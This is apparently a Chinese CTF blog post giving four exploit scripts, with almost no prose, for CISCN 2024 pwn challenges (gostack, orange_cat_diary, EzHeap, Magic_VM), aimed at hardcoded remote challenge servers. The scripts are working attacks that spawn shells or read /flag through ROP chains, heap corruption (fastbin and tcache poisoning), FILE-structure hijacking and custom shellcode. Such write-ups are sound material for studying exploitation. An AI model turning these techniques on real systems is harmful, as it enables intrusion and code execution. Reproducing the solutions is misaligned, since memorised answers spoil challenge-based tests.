先贴个exp,有空补充详细

gostack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
from pwncli import *

context.terminal = ["tmux", "splitw", "-h", "-l", "122"]

if 1:
    addr = '8.147.129.121:30388'
    host = addr.split(':')
    gift.io = remote(host[0], host[1])
    gift.debug = False
else:
    gift.io = process('./gostack')
init_x64_context(gift.io, gift)
load_libc('/usr/lib/x86_64-linux-gnu/libc.so.6')
libc: ELF = gift['libc']
gift.elf = ELF('./gostack')
cmd = '''
    b *0x4a0a9e
    b *0x4A09C6
    c
'''
# launch_gdb(cmd)

CG.set_find_area(True, False)

sys_write = 0x46A380
sys_read = 0x46A180
sys_mmap = 0x46A980
syscall = 0x404043
sh = 0x4A3423
# 4a18a5 : pop rdi ; pop r14 ; pop r13 ; pop r12 ; pop rbp ; pop rbx ; ret
rdi_6 = 0x4A18A5
rax = 0x40F984
rbx = 0x40C321
rcx = 0x420D6D
rsi = 0x42138A
rdx = 0x4944EC
fmt_printf = 0x4914C0
# 49172f : pop rax ; mov rcx, rdx ; call rsi
# 4600c7 : xchg rcx, rax ; ret
xchg_rcx_rax = 0x4600C7
# 460147 : xchg r8, rax ; ret
xchg_r8_rax = 0x460147
prax_mrcx_rdx_callrsi = 0x49172F
syscall_ret = 0x4616C9

ru(b'Input your magic message :')
payload = (
    b'/bin/sh\x00'
    + cyclic(0x100 - 0x8)
    + p64_ex(0xC00000C600)
    + p64_ex(0x108)
    + p64_ex(0x4AA800)
    + p64_ex(0xC000012360)
)
payload = payload.ljust(0x1D0, b'\x00')

payload += (
    p64_ex(rax)
    + p64_ex(0)
    + p64_ex(rdi_6)
    + p64_ex(0)
    + p64_ex(0) * 5
    + p64_ex(rsi)
    + p64_ex(0x564000)
    + p64_ex(rdx)
    + p64_ex(0x10)
    + p64_ex(syscall_ret)
)
payload += (
    p64_ex(rax)
    + p64_ex(59)
    + p64_ex(rdi_6)
    + p64_ex(0x564000)
    + p64_ex(0) * 5
    + p64_ex(rsi)
    + p64_ex(0)
    + p64_ex(rdx)
    + p64_ex(0)
    + p64_ex(syscall_ret)
)

sl(payload)
ru(b'mess')
s(b'/bin/sh\x00')

ia()

orange_cat_diary

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
from pwncli import *

context.terminal = ["tmux", "splitw", "-h", "-l", "122"]

if 1:
    addr = '8.147.128.251:43478'
    host = addr.split(':')
    gift.io = remote(host[0], host[1])
    gift.debug = False
else:
    gift.io = process('./orange_cat_diary')
init_x64_context(gift.io, gift)
load_libc('./libc-2.23.so')
libc: ELF = gift['libc']
gift.elf = ELF('./orange_cat_diary')
cmd = '''
    b *$rebase(0xCAD)
    b *$rebase(0xC52)
    b *$rebase(0xE29)
    b *$rebase(0xDAE)
    b *$rebase(0xD57)
    c
'''

def add(len, data):
    sla(b'Please input your choice:', b'1')
    sa(b'content:', str(len))
    sa(b'content:', data)

def edit(len, data):
    sla(b'Please input your choice:', b'4')
    sa(b'content:', str(len))
    sa(b'content:', data)

def show():
    sla(b'Please input your choice:', b'2')

def dele():
    sla(b'Please input your choice:', b'3')
    

sla(b'name.', b'/bin/sh')
add(0x68, b'inkey')
edit(0x70, b'a' * 0x68 + p64_ex(0xf91))
add(0x8a1, b'i')
add(0x8a1, b'i')
add(0x6b0, b'\x78')
show()
libc_base = u64_ex(ru(b'\x7f')[-6:]) - 0x3c4b78
set_current_libc_base_and_log(libc_base)

add(0x68, b'i')
dele()
edit(8, p64_ex(libc_base + 0x3c4aed))
add(0x68, b'i')
add(0x68, b'i')
edit(0x40, b'a' * 0x13 + p64_ex(get_current_one_gadget_from_libc()[1]))
# launch_gdb(cmd)
sla(b'Please input your choice:', b'1')
sa(b'content:', b'20')

ia()

EZHEAP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
from pwncli import *

context.terminal = ["tmux", "splitw", "-h", "-l", "122"]

if 1:
    addr = '8.147.133.230:30034'
    host = addr.split(':')
    gift.io = remote(host[0], host[1])
    gift.debug = False
else:
    gift.io = process('./EzHeap')
init_x64_context(gift.io, gift)
load_libc('/home/inkey/pwn/ciscn2024初赛/EzHeap/libc.so.6')
libc: ELF = gift['libc']
gift.elf = ELF('./EzHeap')
cmd = '''
    b *$rebase(0x16B3)
    b *$rebase(0x1773)
    b *$rebase(0x18CD)
    b *$rebase(0x19B6)
    b _IO_flush_all_lockp
    c
'''


def add(size, content):
    sla(b'>>', b'1')
    sla(b'size:', str(size))
    sa(b'content', content)


def dele(idx):
    sla(b'>>', b'2')
    sla(b'idx:', str(idx))


def edit(idx, size, content):
    sla(b'>>', b'3')
    sla(b'idx:', str(idx))
    sla(b'size:', str(size))
    sa(b'content', content)


def show(idx):
    sla(b'>>', b'4')
    sla(b'idx:', str(idx))


heap = 0x4060

add(0x100, b'inkey0')
add(0x100, b'inkey1')
add(0x100, b'inkey2')
add(0x100, b'inkey3')
dele(1)
edit(0, 0x110, b'a' * 0x110)
show(0)
ru(b'a' * 0x110)
heap_base = u64_ex(ru(b'Wel', drop=True)) << 12
log_heap_base_addr(heap_base)
edit(0, 0x110, b'\x00' * 0x108 + p64_ex(0x110))

add(0x100, b'inkey1')
dele(2)
dele(1)


edit(
    0,
    0x118,
    b'\x00' * 0x108
    + p64_ex(0x110)
    + p64_ex(protect_ptr(heap_base + 0x420, heap_base - 0x1B70 - 0x110)),
)
add(0x100, b'inkey1')
add(0x100, b'inkey2')
edit(2, 0x110, b'a' * 0x110)
show(2)
libc_base = u64_ex(ru(b'\x7f')[-6:]) - 0x21ADC0
set_current_libc_base_and_log(libc_base)


IO_list_all = libc.sym._IO_list_all
log_address_ex2(IO_list_all)

add(0x10, b'inkey4')
add(0x200, b'heap')
fake_IO = heap_base + 0x750

edit(
    4,
    0x2C0,
    b'\x00' * 0x2A8
    + p64_ex(0x20)
    + p64_ex(protect_ptr(heap_base + 0x8C0, IO_list_all - 0x20)),
)
add(0x10, b'inkey6')
add(0x10, b'inkey7')
edit(7, 0x28, b'\x00' * 0x20 + p64_ex(fake_IO))

_IO_wfile_jumps = libc.sym._IO_wfile_jumps
CG.set_find_area(False, True)

orw = (
    p64_ex(CG.pop_rdi_ret())
    + p64_ex(fake_IO + 0x280 - 0x9d0)
    + p64_ex(CG.pop_rsi_ret())
    + p64_ex(0x2000)
    + p64_ex(CG.pop_rdx_rbx_ret())
    + p64_ex(0x7) * 2
    + p64_ex(libc.sym.mprotect)
    + p64_ex(fake_IO + 0x280)
)

shellcode = shellcraft.open('/flag') + shellcraft.read(3, fake_IO + 0x190, 0x50) + shellcraft.write(1, fake_IO + 0x190, 0x50)
shellcode = asm(shellcode)

payload = flat(
    {
        0x0: 0,
        0x20: p64_ex(libc_base + 0xA0265),
        0x28: p64_ex(libc_base + 0xA0265 + 0x100),
        0xA0: p64_ex(fake_IO + 0x20),
        0xD8: p64_ex(_IO_wfile_jumps),
        0x38: p64_ex(0),
        0x50: p64_ex(0),
        0x80: p64_ex(libc_base + 0x42946),
        0x100: p64_ex(fake_IO + 0x110),
        0x178: p64_ex(libc_base + 0x5A120),
        0x190: b'/flag\x00',
        0x1A0: orw,
        0x280: shellcode,
    },
    filler=b'\x00',
)
# launch_gdb(cmd)
edit(5, 0x400, payload)
sla(b'>>', b'5')


ia()

Magic_VM

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
from pwncli import *

context.terminal = ["tmux", "splitw", "-h", "-l", "160"]

if 1:
    addr = '8.147.133.80:15926'
    host = addr.split(':')
    gift.io = remote(host[0], host[1])
    gift.debug = False
else:
    gift.io = process('./ezvm')
init_x64_context(gift.io, gift)
load_libc('/home/inkey/pwn/ciscn2024初赛/magic_vm/libc.so.6')
libc: ELF = gift['libc']
gift.elf = ELF('./ezvm')

'''
    b *$rebase(0x181B)
    b *$rebase(0x192D)
    b *$rebase(0x1B01)
'''
cmd = '''
    

    b *$rebase(0x1CB2)
    b _IO_flush_all_lockp

    c
'''

payload = b''

def vm(opcode, arg1=0, arg2=0, arg3=0):
    global payload
    if opcode == 5:
        pay = flat(
            {
                0x0: p8_ex(opcode),
                0x1: p8_ex(arg1),
                0x2: p8_ex(arg2),
                0x3: arg3,
            },
            filler=b'\x00',
        )
    elif opcode == 9 or opcode == 10:
        pay = flat(
            {
                0x0: p8_ex(opcode),
                0x1: p8_ex(arg1),
                0x2: p8_ex(arg2),
            },
            filler=b'\x00',
        )
    elif opcode == 11:
        pay = flat(
            {
                0x0: p8_ex(opcode),
            },
            filler=b'\x00',
        )
    else:
        pay = flat(
            {
                0x0: p8_ex(opcode),
                0x1: p8_ex(arg1),
                0x2: p8_ex(arg2),
                0x3: arg3,
            },
            filler=b'\x00',
        )
    payload += pay

'''
type 
1:p64
2:reg
3:addr_off

arg1 type

opcode

1 +
2 -
3 <<
4 >>
5 =
6 &
7 |
8 ^
9 POP
10 PUSH
11 init

'''

cmd += 'c\n' * 5

vm(5, 2 + (1 << 2), 1, p64_ex(0x225980 - 0x2000))
vm(11)
vm(5, 2 + (3 << 2), 3, p8_ex(1)) # 0x7fa5ca334960 (__strnlen_avx2)
vm(11)
vm(11)

vm(2, 2 + (1 << 2), 3, p64_ex(0x2220c0 - 0x2000)) # 6
vm(11)
vm(11) # reg3 --> addr_base

vm(5, 2 + (1 << 2), 1, p64_ex(0))
vm(11)
vm(11)

vm(5, 2 + (1 << 2), 1, p64_ex(0x224680)) # 12
vm(11)
vm(5, 3 + (2 << 2), 1, p8_ex(3)) # addr --> _IO_list_all
vm(11)
vm(11)

# 16 (17-1)
vm(5, 2 + (1 << 2), 1, p64_ex(0xd8))
vm(1, 2 + (1 << 2), 3, p64_ex(0x2200c0)) # reg3 --> _IO_wfile_jumps
vm(11)
vm(11)
vm(5, 3 + (2 << 2), 1, p8_ex(3)) # fake_IO + 0xd8 --> reg3
vm(11)
vm(11)

# 23
vm(5, 2 + (1 << 2), 1, p64_ex(0x368))
vm(2, 2 + (1 << 2), 3, p64_ex(0x12b43f)) # reg3 --> onegadget 0x12b43f
vm(11)
vm(11)
vm(5, 3 + (2 << 2), 1, p8_ex(3)) # fake_IO + 0x368 --> reg3
vm(11)
vm(11)

#30
vm(2, 2 + (1 << 2), 3, p64_ex(0xf4c81 - 0x200)) # reg3 --> fake_IO + 0x200
vm(5, 2 + (1 << 2), 1, p64_ex(0xa0))
vm(11)
vm(11)
vm(5, 3 + (2 << 2), 1, p8_ex(3)) # fake_IO + 0xa0 --> reg3
vm(11)
vm(11)

# 37
vm(1, 2 + (1 << 2), 3, p64_ex(0x100)) # reg3 --> fake_IO + 0x300
vm(5, 2 + (1 << 2), 1, p64_ex(0x2e0))
vm(11)
vm(11)
vm(5, 3 + (2 << 2), 1, p8_ex(3)) # fake_IO + 0x2e0 --> reg3
vm(11)
vm(11)

# 44 + 3
vm(5, 2 + (1 << 2), 1, p64_ex(0x28))
vm(11)
vm(11)
vm(5, 3 + (1 << 2), 1, p64_ex(0x1000)) # fake_IO + 0x28 --> 0x1000
vm(11)
vm(11) # 51

vm(1, 2 + (1 << 2), 3, p64_ex(0x59a70)) # reg3 --> libc.sym.system
vm(11)
vm(11)
vm(5, 2 + (1 << 2), 1, p64_ex(0x368))
vm(11)
vm(11)
vm(5, 3 + (2 << 2), 1, p8_ex(3)) # fake_IO + 0x368 --> reg3
vm(11)
vm(11)

vm(5, 2 + (1 << 2), 1, p64_ex(0))
vm(11)
vm(11)
vm(5, 3 + (1 << 2), 1, b'  sh;\x00\x00\x00') # fake_IO + 0x368 --> reg3
vm(11)
vm(11)


# launch_gdb(cmd)
sa(b'plz input your vm-code', payload)

ia()